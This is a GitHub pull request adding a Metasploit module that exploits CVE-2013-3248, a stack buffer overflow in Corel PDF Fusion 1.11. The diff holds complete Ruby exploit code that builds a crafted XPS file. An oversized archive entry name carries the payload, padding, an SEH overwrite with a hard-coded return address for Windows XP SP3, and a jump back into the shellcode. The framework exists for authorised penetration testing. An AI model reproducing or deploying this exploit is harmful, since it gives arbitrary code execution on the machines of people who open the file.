Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Add module for CVE-2013-3248 #2101

Merged
merged 1 commit into from
Jul 11, 2013
Merged

Add module for CVE-2013-3248 #2101

Changes from all commits
Commits
Show all changes
1 commit
Select commit
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Jump to
Jump to file
Failed to load files.
Diff view
Diff view
99 changes: 99 additions & 0 deletions modules/exploits/windows/fileformat/corelpdf_fusion_bof.rb
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,99 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'
require 'rex/zip'


class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking

include Msf::Exploit::FILEFORMAT
include Msf::Exploit::Remote::Seh

def initialize(info = {})
super(update_info(info,
'Name' => 'Corel PDF Fusion Stack Buffer Overflow',
'Description' => %q{
This module exploits a stack-based buffer overflow vulnerability in version 1.11 of
Corel PDF Fusion. The vulnerability exists while handling XPS files with long entry
names. In order for the payload to be executed, an attacker must convince the target
user to open a specially crafted XPS file with Corel PDF Fusion. By doing so, an
attacker can execute arbitrary code as the target user.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Kaveh Ghaemmaghami', # Vulnerability discovery
'juan vazquez' # Metasploit module
],
'References' =>
[
[ 'CVE', '2013-3248' ],
[ 'OSVDB', '94933' ],
[ 'BID', '61010' ],
[ 'URL', 'http://secunia.com/advisories/52707/' ]
],
'Platform' => [ 'win' ],
'Payload' =>
{
'DisableNops' => true,
'Space' => 4000
},
'Targets' =>
[
# Corel PDF Fusion 1.11 (build 2012/04/25:21:00:00)
# CorelFusion.exe 2.6.2.0
# ret from unicode.nls # call dword ptr ss:[ebp+0x30] # tested over Windows XP SP3 updates
[ 'Corel PDF Fusion 1.11 / Windows XP SP3', { 'Ret' => 0x00280b0b, 'Offset' => 4640 } ]
],
'DisclosureDate' => 'Jul 08 2013',
'DefaultTarget' => 0))

register_options(
[
OptString.new('FILENAME', [ true, 'The output file name.', 'msf.xps'])
], self.class)

end


def exploit
template = [
"[Content_Types].xml",
"_rels/.rels",
"docProps/thumbnail.jpeg",
"docProps/core.xml",
"FixedDocSeq.fdseq",
"Documents/1/Pages/_rels/1.fpage.rels",
"Documents/1/_rels/FixedDoc.fdoc.rels",
"Documents/1/FixedDoc.fdoc",
"Documents/1/Structure/Fragments/1.frag",
"Documents/1/Structure/DocStructure.struct",
"Documents/1/Pages/1.fpage",
]

xps = Rex::Zip::Archive.new
template.each do |k|
xps.add_file(k, rand_text_alpha(10 + rand(20)))
end

resources_length = "Resources/".length
sploit = "Resources/"
sploit << payload.encoded
sploit << rand_text(target['Offset'] - sploit.length)
sploit << generate_seh_record(target.ret)
sploit << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-#{target['Offset'] + 8 - resources_length}").encode_string # 8 => seh_record length
sploit << rand_text(1500) # Trigger exception

xps.add_file(sploit, rand_text_alpha(10 + rand(20)))

print_status("Creating '#{datastore['FILENAME']}' file...")
file_create(xps.pack)
end

end